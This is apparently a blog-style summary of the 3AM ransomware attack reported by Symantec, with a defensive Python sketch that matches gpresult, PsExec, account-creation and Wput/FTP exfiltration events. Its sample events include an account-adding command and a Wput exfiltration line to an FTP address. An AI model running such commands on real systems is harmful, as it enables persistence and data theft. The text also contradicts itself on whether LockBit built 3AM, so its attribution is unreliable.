Symantec’s Threat Hunter Team has recently discovered a new ransomware variant called 3AM [1] [2] [3] [4] [5]. Written in Rust [3] [5], it is a completely new malware family and appears to be unrelated to any known ransomware group. In a recent attack, the attacker first attempted to deploy LockBit; when LockBit was blocked, they switched to 3AM [1]. The 3AM ransomware managed to infiltrate one compromised machine [1], highlighting the trend of attackers using multiple ransomware families in a single attack. The authors of 3AM have no known links to cybercrime organizations [3].

Description

The threat actors behind 3AM used a range of techniques in their attack. They ran the “gpresult” command to dump policy settings for specific users and executed Cobalt Strike components to escalate privileges [3]. They also used PsExec for reconnaissance and lateral movement [3]. For persistence, an extra user account was added [3], and victim files were exfiltrated with the Wput command-line FTP client to an FTP server under the attackers’ control [3].
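As an added example (not code from Symantec’s report or from any of the cited sources), the following Python sketch shows how a defender might match process-creation telemetry against the chain described above: gpresult policy dumps, PsExec, account creation and Wput/FTP exfiltration. The sample event lines, the `key=value` log format and the field names are constructed assumptions, and a single user triggering several stages is treated as a stronger signal than any one rule.

```python
import re

# Constructed sample process-creation events (assumed key=value format, not real telemetry).
SAMPLE_EVENTS = [
    'host=WS01 user=CORP\\jdoe parent=cmd.exe image=gpresult.exe cmdline="gpresult /z /user CORP\\admin"',
    'host=WS01 user=CORP\\jdoe parent=services.exe image=PSEXESVC.exe cmdline="PSEXESVC.exe"',
    'host=DC01 user=CORP\\jdoe parent=cmd.exe image=net.exe cmdline="net user backup_svc P@ss /add"',
    'host=WS01 user=CORP\\jdoe parent=cmd.exe image=wput.exe cmdline="wput C:\\share\\* ftp://203.0.113.5/"',
    'host=WS02 user=CORP\\asmith parent=explorer.exe image=notepad.exe cmdline="notepad.exe notes.txt"',
]

# One rule per stage of the reported chain; the label prefix (before ":") is the stage name.
RULES = {
    "discovery: gpresult policy dump": lambda e: e["image"].lower() == "gpresult.exe",
    "lateral movement: PsExec": lambda e: e["image"].lower() in ("psexec.exe", "psexesvc.exe"),
    "persistence: local account added": lambda e: e["image"].lower() == "net.exe"
        and re.search(r"\buser\b.*\s/add(\s|$)", e["cmdline"], re.I),
    "exfiltration: Wput to FTP": lambda e: e["image"].lower() == "wput.exe"
        or re.search(r"\bftp://", e["cmdline"], re.I),
}

# key=value pairs; quoted values may contain backslash-escaped characters.
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line):
    """Parse one constructed event line into a dict of fields (quotes stripped)."""
    fields = {}
    for key, val in FIELD_RE.findall(line):
        fields[key] = val[1:-1] if val.startswith('"') else val
    return fields


def match_events(lines):
    """Return (host, user, rule) tuples for every rule each event satisfies."""
    hits = []
    for line in lines:
        e = parse_event(line)
        e.setdefault("image", ""), e.setdefault("cmdline", "")
        for name, pred in RULES.items():
            if pred(e):
                hits.append((e.get("host", "?"), e.get("user", "?"), name))
    return hits


def chained_users(hits, min_stages=2):
    """Users who triggered at least min_stages distinct stages of the chain."""
    stages = {}
    for _host, user, name in hits:
        stages.setdefault(user, set()).add(name.split(":")[0])
    return {u: sorted(s) for u, s in stages.items() if len(s) >= min_stages}
```

Run on the sample events, the rules fire four times for CORP\jdoe across all four stages, while the unrelated notepad event on WS02 produces nothing.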

It is worth noting that 3AM was deployed to only three machines on the victim organization’s network [3], and it was successfully blocked on two of them. The fact that 3AM was used as a fallback suggests it may be of interest to attackers and could reappear in the future [3]. However, the report does not provide information on a backup strategy for dealing with 3AM or LockBit [1].

Furthermore, it has been discovered that 3AM is a new ransomware-as-a-service (RaaS) developed by the LockBit ransomware group, whose purpose is to decrypt files that have been encrypted by LockBit [4]. Although still under development, 3AM has already been used in a few attacks [4]. To protect against 3AM and ransomware in general, it is recommended to keep software up to date, use a security solution, and train yourself and your employees to identify and avoid phishing attacks [4]. A backup plan is crucial in case of a ransomware attack, as it allows files to be recovered [4]. Paying the ransom is not advised, as doing so only encourages attackers to continue [4].

Conclusion

The discovery of 3AM highlights the evolving tactics of ransomware attackers, who now use multiple ransomware families in a single attack. The fact that 3AM was used as a fallback suggests its potential significance to attackers and the possibility of its recurrence in the future. It is crucial for organizations to have a robust backup strategy and to stay vigilant by keeping software up to date and deploying security solutions. Educating employees on identifying and avoiding phishing attacks is also essential. By taking these precautions, organizations can mitigate the risks posed by 3AM and other ransomware variants and reduce the impact of potential attacks.

References

[1] https://www.darkreading.com/attacks-breaches/when-lockbit-ransomware-fails-attackers-deploy-brand-new-3am
[2] https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
[3] https://www.infosecurity-magazine.com/news/3am-ransomware-variant-discovered/
[4] https://itssecurityyall.substack.com/p/lockbit-ransomware-developers-launch
[5] https://www.redpacketsecurity.com/hackers-use-new-am-ransomware-to-save-failed-lockbit-attack/